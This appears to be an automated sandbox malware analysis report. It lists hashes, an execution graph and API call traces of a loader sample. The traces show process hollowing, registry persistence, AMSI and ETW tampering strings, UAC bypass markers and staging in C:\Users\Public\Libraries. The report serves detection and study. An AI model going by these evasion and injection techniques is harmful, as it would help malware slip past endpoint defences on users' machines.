                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6a5946a606510157bdb5b42b9b3fdf9ca01be28da13ee7024ef1a2102a988ea0
                                                                                                                            • Instruction ID: b7fe74f21ba21b1a8201cb951cedff7a14836012c73d779de3c56ae1f534544b
                                                                                                                            • Opcode Fuzzy Hash: 6a5946a606510157bdb5b42b9b3fdf9ca01be28da13ee7024ef1a2102a988ea0
                                                                                                                            • Instruction Fuzzy Hash: F5D157B291FBC98FE765EB6C88555B97F90EF26250B1841FED08DC70B3E9189809C381
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1654430431.00007FFAABA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAABA20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_7ffaaba20000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8ca3ac8d76e7e80c1c624e9e625305fa1eab7642eb9ac4ebc19c6dcc590070dc
                                                                                                                            • Instruction ID: 4513c9f333684e225a6984c998a66d3e42ab4843ed636e7f2d2401846dffad65
                                                                                                                            • Opcode Fuzzy Hash: 8ca3ac8d76e7e80c1c624e9e625305fa1eab7642eb9ac4ebc19c6dcc590070dc
                                                                                                                            • Instruction Fuzzy Hash: C4B1DDA191F7C98FE397977848655617FE0EF57650B0981FBD0C8CB1B3E908984AC3A2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1654430431.00007FFAABA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAABA20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_7ffaaba20000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 53de2596b495ec47377b27fc596627a4e4866e75c4e6c76413789c2b5fac54df
                                                                                                                            • Instruction ID: 71883a2fe8ddc57cf3da650c69f6c3936b1b03960fd851b9b1d702a18614be7c
                                                                                                                            • Opcode Fuzzy Hash: 53de2596b495ec47377b27fc596627a4e4866e75c4e6c76413789c2b5fac54df
                                                                                                                            • Instruction Fuzzy Hash: 6531F572E2FA874FF39597680466278A6C6FF87290B5481B9D04EC71F2ED29D8094280
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1654430431.00007FFAABA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAABA20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_7ffaaba20000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f7485de88ffc298e14b6599050d13295bc48443b6fee9cf4dff7d039a2e0a401
                                                                                                                            • Instruction ID: ee9d8ac7024f839efe67e6e0d2740416d8f4b69dcd9d56413be42cf401805e93
• Opcode Fuzzy Hash: f7485de88ffc298e14b6599050d13295bc48443b6fee9cf4dff7d039a2e0a401
• Instruction Fuzzy Hash: AF41C6A295EBC66FE36A872858565646FA0DF43290B1D81FAD0CDCB4F3F8085C0E5391
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000011.00000002.1654430431.00007FFAABA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAABA20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ffaaba20000_powershell.jbxd
Similarity
• API ID:
• String ID: 8hz$8hz$8hz$8hz
• API String ID: 0-2997940489
• Opcode ID: 2e495c9f988770dc48786f71e39d63e27360eba7e989caa33ea920b4d796815d
• Instruction ID: 68b2b3bff8942d55ef7ab8a3a08466189fc68c546b1e461d3bfc625d4fd30a42
• Opcode Fuzzy Hash: 2e495c9f988770dc48786f71e39d63e27360eba7e989caa33ea920b4d796815d
• Instruction Fuzzy Hash: 83A14662A1EBC68FE7A5876858515B07FE0DF67250B1881FBD48EC71F3E8199C0A83D1
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 16%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 29.3%
Total number of Nodes: 1403
Total number of Limit Nodes: 17
[Execution graph data: the node and edge list (execution_graph, node IDs paired with basic-block addresses and "->" edges) that backs the report's interactive graph viewer; the listing is cut off at the end of the page. Windows API calls named in the node labels: QueryPerformanceCounter, GetTickCount, InetIsOffline, LocalAlloc, TlsSetValue, TlsGetValue, LoadLibraryW, GetModuleHandleW, GetProcAddress, NtAllocateVirtualMemory, GetCurrentProcess, RtlMoveMemory, WinExec, EnumSystemLocalesA, GetFileAttributesA, RtlDosPathNameToNtPathName_U, NtCreateFile, NtWriteFile, NtClose, SysFreeString, RegOpenKeyA, RegSetValueExA, RegCloseKey, CreateProcessAsUserW, ExitProcess. Collapsed subgraphs appear only as "N API calls" summary nodes (N = 2, 7, 11, 17, 29, 42, 51).]
17 API calls 36507->36508 36509 2998646 36508->36509 36510 2982ee0 2 API calls 36509->36510 36511 299864b 36510->36511 36512 2984824 11 API calls 36511->36512 36513 2998693 36512->36513 36514 29847b0 11 API calls 36513->36514 36515 29986c4 36514->36515 36516 2997be8 17 API calls 36515->36516 36517 29986e8 36516->36517 36518 2984824 11 API calls 36517->36518 36519 2998704 36518->36519 36520 29847b0 11 API calls 36519->36520 36521 2998735 36520->36521 36522 2997be8 17 API calls 36521->36522 36523 2998759 36522->36523 36524 2984824 11 API calls 36523->36524 36525 2998775 36524->36525 36526 29847b0 11 API calls 36525->36526 36527 29987a6 36526->36527 36528 2997be8 17 API calls 36527->36528 36529 29987ca GetThreadContext 36528->36529 36529->36413 36530 29987ec 36529->36530 36531 2984824 11 API calls 36530->36531 36532 2998808 36531->36532 36533 29847b0 11 API calls 36532->36533 36534 2998839 36533->36534 36535 2997be8 17 API calls 36534->36535 36536 299885d 36535->36536 36537 2984824 11 API calls 36536->36537 36538 2998879 36537->36538 36539 29847b0 11 API calls 36538->36539 36540 29988aa 36539->36540 36541 2997be8 17 API calls 36540->36541 36542 29988ce 36541->36542 36543 2984824 11 API calls 36542->36543 36544 29988ea 36543->36544 36545 29847b0 11 API calls 36544->36545 36546 299891b 36545->36546 36547 2997be8 17 API calls 36546->36547 36548 299893f 36547->36548 36549 2984824 11 API calls 36548->36549 36550 299895b 36549->36550 36551 29847b0 11 API calls 36550->36551 36552 299898c 36551->36552 36553 2997be8 17 API calls 36552->36553 36554 29989b0 36553->36554 36555 2984824 11 API calls 36554->36555 36556 29989cc 36555->36556 36557 29847b0 11 API calls 36556->36557 36558 29989fd 36557->36558 36559 2997be8 17 API calls 36558->36559 36560 2998a21 NtReadVirtualMemory 36559->36560 36561 2998d5c 36560->36561 36562 2998a55 36560->36562 36563 2984824 11 API calls 36561->36563 36564 2984824 11 API calls 36562->36564 36566 2998d78 36563->36566 36565 2998a71 36564->36565 36568 
29847b0 11 API calls 36565->36568 36567 29847b0 11 API calls 36566->36567 36569 2998da9 36567->36569 36570 2998aa2 36568->36570 36571 2997be8 17 API calls 36569->36571 36572 2997be8 17 API calls 36570->36572 36573 2998d55 36571->36573 36574 2998ac6 36572->36574 36575 2984824 11 API calls 36573->36575 36576 2984824 11 API calls 36574->36576 36578 2998de9 36575->36578 36577 2998ae2 36576->36577 36579 29847b0 11 API calls 36577->36579 36580 29847b0 11 API calls 36578->36580 36582 2998b13 36579->36582 36581 2998e1a 36580->36581 36583 2997be8 17 API calls 36581->36583 36584 2997be8 17 API calls 36582->36584 36585 2998e3e 36583->36585 36586 2998b37 36584->36586 36587 2984824 11 API calls 36585->36587 36588 2984824 11 API calls 36586->36588 36589 2998e5a 36587->36589 36590 2998b53 36588->36590 36592 29847b0 11 API calls 36589->36592 36591 29847b0 11 API calls 36590->36591 36594 2998b84 36591->36594 36593 2998e8b 36592->36593 36595 2997be8 17 API calls 36593->36595 36596 2997be8 17 API calls 36594->36596 36597 2998eaf 36595->36597 36598 2998ba8 NtUnmapViewOfSection 36596->36598 36599 2984824 11 API calls 36597->36599 36600 2998be8 36598->36600 36601 2998bc0 36598->36601 36605 2998ecb 36599->36605 36603 2984824 11 API calls 36600->36603 36803 2997968 GetModuleHandleW GetProcAddress NtAllocateVirtualMemory 36601->36803 36607 2998c04 36603->36607 36604 2998be1 36606 2984824 11 API calls 36604->36606 36608 29847b0 11 API calls 36605->36608 36610 2998c75 36606->36610 36609 29847b0 11 API calls 36607->36609 36612 2998efc 36608->36612 36613 2998c35 36609->36613 36611 29847b0 11 API calls 36610->36611 36618 2998ca6 36611->36618 36614 2997be8 17 API calls 36612->36614 36616 2997be8 17 API calls 36613->36616 36615 2998f20 36614->36615 36805 2997968 GetModuleHandleW GetProcAddress NtAllocateVirtualMemory 36615->36805 36616->36604 36620 2997be8 17 API calls 36618->36620 36619 2998f41 36619->36413 36621 2984824 11 API calls 36619->36621 36622 2998cca 36620->36622 36624 2998f6f 
36621->36624 36623 2984824 11 API calls 36622->36623 36625 2998ce6 36623->36625 36626 29847b0 11 API calls 36624->36626 36627 29847b0 11 API calls 36625->36627 36628 2998fa0 36626->36628 36629 2998d17 36627->36629 36630 2997be8 17 API calls 36628->36630 36632 2997be8 17 API calls 36629->36632 36631 2998fc4 36630->36631 36633 2984824 11 API calls 36631->36633 36634 2998d3b 36632->36634 36636 2998fe0 36633->36636 36804 2997968 GetModuleHandleW GetProcAddress NtAllocateVirtualMemory 36634->36804 36637 29847b0 11 API calls 36636->36637 36638 2999011 36637->36638 36639 2997be8 17 API calls 36638->36639 36640 2999035 36639->36640 36806 2997e58 36640->36806 36642 2984824 11 API calls 36644 29990bc 36642->36644 36643 299903c 36643->36642 36645 29847b0 11 API calls 36644->36645 36646 29990ed 36645->36646 36647 2997be8 17 API calls 36646->36647 36648 2999111 36647->36648 36649 2984824 11 API calls 36648->36649 36650 299912d 36649->36650 36651 29847b0 11 API calls 36650->36651 36652 299915e 36651->36652 36653 2997be8 17 API calls 36652->36653 36654 2999182 36653->36654 36655 2984824 11 API calls 36654->36655 36656 299919e 36655->36656 36657 29847b0 11 API calls 36656->36657 36658 29991cf 36657->36658 36659 2997be8 17 API calls 36658->36659 36660 29991f3 NtWriteVirtualMemory 36659->36660 36661 2984824 11 API calls 36660->36661 36662 299922c 36661->36662 36663 29847b0 11 API calls 36662->36663 36664 299925d 36663->36664 36665 2997be8 17 API calls 36664->36665 36666 2999281 36665->36666 36667 2984824 11 API calls 36666->36667 36668 299929d 36667->36668 36669 29847b0 11 API calls 36668->36669 36670 29992ce 36669->36670 36671 2997be8 17 API calls 36670->36671 36672 29992f2 36671->36672 36673 2984824 11 API calls 36672->36673 36674 299930e 36673->36674 36675 29847b0 11 API calls 36674->36675 36676 299933f 36675->36676 36677 2997be8 17 API calls 36676->36677 36678 2999363 NtWriteVirtualMemory 36677->36678 36679 2984824 11 API calls 36678->36679 36680 299939f 36679->36680 36681 
29847b0 11 API calls 36680->36681 36682 29993d0 36681->36682 36683 2997be8 17 API calls 36682->36683 36684 29993f4 36683->36684 36685 2984824 11 API calls 36684->36685 36686 2999410 36685->36686 36687 29847b0 11 API calls 36686->36687 36688 2999441 36687->36688 36689 2997be8 17 API calls 36688->36689 36690 2999465 36689->36690 36691 2984824 11 API calls 36690->36691 36692 2999481 36691->36692 36693 29847b0 11 API calls 36692->36693 36694 29994b2 36693->36694 36695 2997be8 17 API calls 36694->36695 36696 29994d6 SetThreadContext NtResumeThread 36695->36696 36697 2984824 11 API calls 36696->36697 36698 2999522 36697->36698 36699 29847b0 11 API calls 36698->36699 36700 2999553 36699->36700 36701 2997be8 17 API calls 36700->36701 36702 2999577 36701->36702 36703 2984824 11 API calls 36702->36703 36704 2999593 36703->36704 36705 29847b0 11 API calls 36704->36705 36706 29995c4 36705->36706 36707 2997be8 17 API calls 36706->36707 36708 29995e8 36707->36708 36709 2984824 11 API calls 36708->36709 36710 2999604 36709->36710 36711 29847b0 11 API calls 36710->36711 36712 2999635 36711->36712 36713 2997be8 17 API calls 36712->36713 36714 2999659 36713->36714 36715 2984824 11 API calls 36714->36715 36716 2999675 36715->36716 36717 29847b0 11 API calls 36716->36717 36718 29996a6 36717->36718 36719 2997be8 17 API calls 36718->36719 36720 29996ca 36719->36720 36721 2982c2c 11 API calls 36720->36721 36722 29996d9 36721->36722 36723 2984824 11 API calls 36722->36723 36724 29996fb 36723->36724 36725 29847b0 11 API calls 36724->36725 36726 299972c 36725->36726 36727 2997be8 17 API calls 36726->36727 36728 2999750 36727->36728 36809 2997ac0 LoadLibraryW 36728->36809 36731 2997ac0 4 API calls 36732 2999778 36731->36732 36733 2997ac0 4 API calls 36732->36733 36734 299978c 36733->36734 36735 2984824 11 API calls 36734->36735 36736 29997a8 36735->36736 36737 29847b0 11 API calls 36736->36737 36738 29997d9 36737->36738 36739 2997be8 17 API calls 36738->36739 36740 29997fd 36739->36740 36741 
2997ac0 4 API calls 36740->36741 36742 2999811 36741->36742 36743 2997ac0 4 API calls 36742->36743 36744 2999825 36743->36744 36745 2984824 11 API calls 36744->36745 36746 2999841 36745->36746 36747 29847b0 11 API calls 36746->36747 36748 299985f 36747->36748 36749 2997ac0 4 API calls 36748->36749 36750 2999877 36749->36750 36751 2984824 11 API calls 36750->36751 36752 2999893 36751->36752 36753 29847b0 11 API calls 36752->36753 36754 29998b1 36753->36754 36755 2997ac0 4 API calls 36754->36755 36756 29998c9 36755->36756 36757 2984824 11 API calls 36756->36757 36758 29998e5 36757->36758 36759 29847b0 11 API calls 36758->36759 36760 2999916 36759->36760 36761 2997be8 17 API calls 36760->36761 36762 299993a 36761->36762 36763 2984824 11 API calls 36762->36763 36764 2999956 36763->36764 36765 29847b0 11 API calls 36764->36765 36766 2999987 36765->36766 36767 2997be8 17 API calls 36766->36767 36767->36413 36768->35783 36769->35928 36770->36098 36771->35947 36773 2984968 GetProcAddress 36772->36773 36774 2997b20 36773->36774 36787 2984538 36774->36787 36777 29847b0 11 API calls 36778 2997b53 36777->36778 36779 2997b5b GetModuleHandleA GetProcAddress VirtualProtect 36778->36779 36780 2997b97 36779->36780 36781 29844c4 11 API calls 36780->36781 36782 2997ba4 36781->36782 36782->36347 36785 29844ca 36783->36785 36784 29844f0 36784->35606 36785->36784 36786 2982c2c 11 API calls 36785->36786 36786->36785 36788 298453c 36787->36788 36789 2984560 36788->36789 36790 2982c2c 11 API calls 36788->36790 36789->36777 36790->36789 36791->36364 36792->36364 36794 2984eea SysAllocStringLen 36793->36794 36795 2984f00 36793->36795 36794->36795 36796 2984bf4 36794->36796 36795->36381 36797 2984c10 36796->36797 36798 2984c00 SysAllocStringLen 36796->36798 36797->36381 36798->36796 36798->36797 36799->36384 36801 2984c38 36800->36801 36802 2984c2a SysFreeString 36800->36802 36801->36391 36802->36801 36803->36604 36804->36573 36805->36619 36807 2982c10 11 API calls 36806->36807 36808 2997e8e 
36807->36808 36808->36643 36810 2997b0a 36809->36810 36811 2997add GetProcAddress 36809->36811 36810->36731 36812 2997ae8 NtWriteVirtualMemory 36811->36812 36813 2997b04 FreeLibrary 36811->36813 36812->36813 36814 2997b02 36812->36814 36813->36810 36814->36813 36815 2981c6c 36816 2981c7c 36815->36816 36817 2981d04 36815->36817 36818 2981c89 36816->36818 36819 2981cc0 36816->36819 36820 2981f58 36817->36820 36821 2981d0d 36817->36821 36823 2981c94 36818->36823 36863 2981724 36818->36863 36822 2981724 10 API calls 36819->36822 36824 2981fec 36820->36824 36830 2981f68 36820->36830 36831 2981fac 36820->36831 36825 2981e24 36821->36825 36826 2981d25 36821->36826 36828 2981cd7 36822->36828 36840 2981e7c 36825->36840 36841 2981e55 Sleep 36825->36841 36849 2981e95 36825->36849 36827 2981d2c 36826->36827 36833 2981d48 36826->36833 36836 2981dfc 36826->36836 36848 2981a8c 8 API calls 36828->36848 36853 2981cfd 36828->36853 36835 2981724 10 API calls 36830->36835 36834 2981fb2 36831->36834 36837 2981724 10 API calls 36831->36837 36832 2981724 10 API calls 36852 2981f2c 36832->36852 36842 2981d79 Sleep 36833->36842 36846 2981d9c 36833->36846 36854 2981f82 36835->36854 36838 2981724 10 API calls 36836->36838 36855 2981fc1 36837->36855 36857 2981e05 36838->36857 36839 2981fa7 36840->36832 36840->36849 36841->36840 36844 2981e6f Sleep 36841->36844 36845 2981d91 Sleep 36842->36845 36842->36846 36843 2981ca1 36851 2981cb9 36843->36851 36887 2981a8c 36843->36887 36844->36825 36845->36833 36847 2981e1d 36848->36853 36852->36849 36856 2981a8c 8 API calls 36852->36856 36854->36839 36858 2981a8c 8 API calls 36854->36858 36855->36839 36859 2981a8c 8 API calls 36855->36859 36860 2981f50 36856->36860 36857->36847 36861 2981a8c 8 API calls 36857->36861 36858->36839 36862 2981fe4 36859->36862 36861->36847 36864 2981968 36863->36864 36873 298173c 36863->36873 36866 2981a80 36864->36866 36867 2981938 36864->36867 36865 298174e 36868 298175d 36865->36868 36878 298182c 36865->36878 36881 298180a 
Sleep 36865->36881 36869 2981a89 36866->36869 36870 2981684 VirtualAlloc 36866->36870 36872 2981947 Sleep 36867->36872 36876 2981986 36867->36876 36868->36843 36869->36843 36871 29816af 36870->36871 36879 29816bf 36870->36879 36904 2981644 36871->36904 36875 298195d Sleep 36872->36875 36872->36876 36873->36865 36877 29817cb Sleep 36873->36877 36875->36867 36882 29815cc VirtualAlloc 36876->36882 36884 29819a4 36876->36884 36877->36865 36880 29817e4 Sleep 36877->36880 36886 2981838 36878->36886 36910 29815cc 36878->36910 36879->36843 36880->36873 36881->36878 36883 2981820 Sleep 36881->36883 36882->36884 36883->36865 36884->36843 36886->36843 36888 2981b6c 36887->36888 36889 2981aa1 36887->36889 36890 29816e8 36888->36890 36891 2981aa7 36888->36891 36889->36891 36893 2981b13 Sleep 36889->36893 36892 2981c66 36890->36892 36895 2981644 2 API calls 36890->36895 36894 2981ab0 36891->36894 36897 2981b4b Sleep 36891->36897 36900 2981b81 36891->36900 36892->36851 36893->36891 36896 2981b2d Sleep 36893->36896 36894->36851 36898 29816f5 VirtualFree 36895->36898 36896->36889 36899 2981b61 Sleep 36897->36899 36897->36900 36901 298170d 36898->36901 36899->36891 36902 2981ba4 36900->36902 36903 2981c00 VirtualFree 36900->36903 36901->36851 36902->36851 36903->36851 36905 2981681 36904->36905 36906 298164d 36904->36906 36905->36879 36906->36905 36907 298164f Sleep 36906->36907 36908 2981664 36907->36908 36908->36905 36909 2981668 Sleep 36908->36909 36909->36906 36914 2981560 36910->36914 36912 29815d4 VirtualAlloc 36913 29815eb 36912->36913 36913->36886 36915 2981500 36914->36915 36915->36912 36916 2984ea0 36917 2984ead 36916->36917 36921 2984eb4 36916->36921 36925 2984bf4 SysAllocStringLen 36917->36925 36922 2984c14 36921->36922 36923 2984c1a SysFreeString 36922->36923 36924 2984c20 36922->36924 36923->36924 36925->36921 36926 2984c60 36927 2984c64 36926->36927 36928 2984c87 36926->36928 36929 2984c24 36927->36929 36932 2984c77 SysReAllocStringLen 36927->36932 36930 2984c38 
36929->36930 36931 2984c2a SysFreeString 36929->36931 36931->36930 36932->36928 36933 2984bf4 36932->36933 36934 2984c10 36933->36934 36935 2984c00 SysAllocStringLen 36933->36935 36935->36933 36935->36934 36936 29a1ac0 36937 2984824 11 API calls 36936->36937 36938 29a1ae1 36937->36938 36939 29a1aec 36938->36939 36940 29a1af9 36939->36940 36941 29847b0 11 API calls 36940->36941 36942 29a1b18 36941->36942 36943 2984964 36942->36943 36944 29a1b23 36943->36944 38373 2984698 36944->38373 38374 298469e 38373->38374 38375 29aa2f4 38385 2986530 38375->38385 38379 29aa322 38390 29a9b54 timeSetEvent 38379->38390 38381 29aa32c 38382 29aa33a GetMessageA 38381->38382 38383 29aa32e TranslateMessage DispatchMessageA 38382->38383 38384 29aa34a 38382->38384 38383->38382 38386 298653b 38385->38386 38391 298415c 38386->38391 38389 2984270 SysAllocStringLen SysFreeString SysReAllocStringLen 38389->38379 38390->38381 38392 29841a2 38391->38392 38393 298421b 38392->38393 38397 29843ac 38392->38397 38405 29840f4 38393->38405 38396 29843dd 38410 2984320 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 38396->38410 38397->38396 38400 29843ee 38397->38400 38399 29843e7 38399->38400 38401 2984433 FreeLibrary 38400->38401 38402 2984457 38400->38402 38401->38400 38403 2984460 38402->38403 38404 2984466 ExitProcess 38402->38404 38403->38404 38406 2984104 38405->38406 38407 2984137 38405->38407 38406->38407 38409 29815cc VirtualAlloc 38406->38409 38411 298582c 38406->38411 38407->38389 38409->38406 38410->38399 38412 298583c GetModuleFileNameA 38411->38412 38414 2985858 38411->38414 38415 2985a90 GetModuleFileNameA RegOpenKeyExA 38412->38415 38414->38406 38416 2985b13 38415->38416 38417 2985ad3 RegOpenKeyExA 38415->38417 38433 29858cc 12 API calls 38416->38433 38417->38416 38418 2985af1 RegOpenKeyExA 38417->38418 38418->38416 38420 2985b9c lstrcpynA GetThreadLocale GetLocaleInfoA 38418->38420 38424 2985bd3 38420->38424 38425 2985cb6 38420->38425 38421 2985b38 RegQueryValueExA 38422 
2985b58 RegQueryValueExA 38421->38422 38423 2985b76 RegCloseKey 38421->38423 38422->38423 38423->38414 38424->38425 38426 2985be3 lstrlenA 38424->38426 38425->38414 38428 2985bfb 38426->38428 38428->38425 38429 2985c48 38428->38429 38430 2985c20 lstrcpynA LoadLibraryExA 38428->38430 38429->38425 38431 2985c52 lstrcpynA LoadLibraryExA 38429->38431 38430->38429 38431->38425 38432 2985c84 lstrcpynA LoadLibraryExA 38431->38432 38432->38425 38433->38421
                                                                                                                            APIs
                                                                                                                            • InetIsOffline.URL(00000000,00000000,029A8FB6,?,?,?,00000000,00000000), ref: 0299D604
                                                                                                                              • Part of subcall function 02997BE8: LoadLibraryW.KERNEL32(?,00000000,02997C9A), ref: 02997C18
                                                                                                                              • Part of subcall function 02997BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02997C9A), ref: 02997C1E
                                                                                                                              • Part of subcall function 02997BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02997C37
                                                                                                                              • Part of subcall function 02987E18: GetFileAttributesA.KERNEL32(00000000,?,0299E0EE,ScanString,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC,ScanString,029E4344,029A8FEC,UacScan,029E4344,029A8FEC,UacInitialize), ref: 02987E23
                                                                                                                              • Part of subcall function 0298C320: GetModuleFileNameA.KERNEL32(00000000,?,00000105,029E45F0,?,0299E40F,ScanBuffer,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC,ScanBuffer,029E4344,029A8FEC,OpenSession), ref: 0298C337
                                                                                                                              • Part of subcall function 0299C4DC: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0299C5AC), ref: 0299C517
                                                                                                                              • Part of subcall function 0299C4DC: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0299C5AC), ref: 0299C547
                                                                                                                              • Part of subcall function 0299C4DC: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0299C55C
                                                                                                                              • Part of subcall function 0299C4DC: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0299C588
                                                                                                                              • Part of subcall function 0299C4DC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0299C591
                                                                                                                              • Part of subcall function 02987E3C: GetFileAttributesA.KERNEL32(00000000,?,029A1133,ScanString,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC,ScanBuffer,029E4344,029A8FEC,ScanString), ref: 02987E47
                                                                                                                              • Part of subcall function 02988004: CreateDirectoryA.KERNEL32(00000000,00000000,?,029A1324,ScanBuffer,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC,Initialize,029E4344,029A8FEC,ScanString,029E4344,029A8FEC), ref: 02988011
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$AttributesModuleNamePath$AddressCloseCreateDirectoryHandleInetInformationLibraryLoadName_OfflineOpenProcQueryRead
                                                                                                                            • String ID: .url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$bcrypt$can$endpointdlp$http$ieproxy$iexpress.exe$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                                                            • API String ID: 2725267379-582383607
                                                                                                                            • Opcode ID: a4a4b7e7bf25414d11e97e5687f8cebb6f832ed5ad09ed894c57ca30d3d1a7cb
                                                                                                                            • Instruction ID: 5d7c03365745cfb59252762070a42aeb662a1bfa82a7f8d76c61e73a47c6c7fa
                                                                                                                            • Opcode Fuzzy Hash: a4a4b7e7bf25414d11e97e5687f8cebb6f832ed5ad09ed894c57ca30d3d1a7cb
                                                                                                                            • Instruction Fuzzy Hash: EB04FA34A5025ADFDF60FB64D890ADEB3B6BFC9704F1454E5A009AB650DB70AE81CF90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 4522 29a5fa0-29a618a call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 4577 29a6190-29a638f call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 29848b0 4522->4577 4578 29a618b call 2997be8 4522->4578 4637 29a6b54-29a6cd7 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 29848b0 4577->4637 4638 29a6395-29a69b4 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 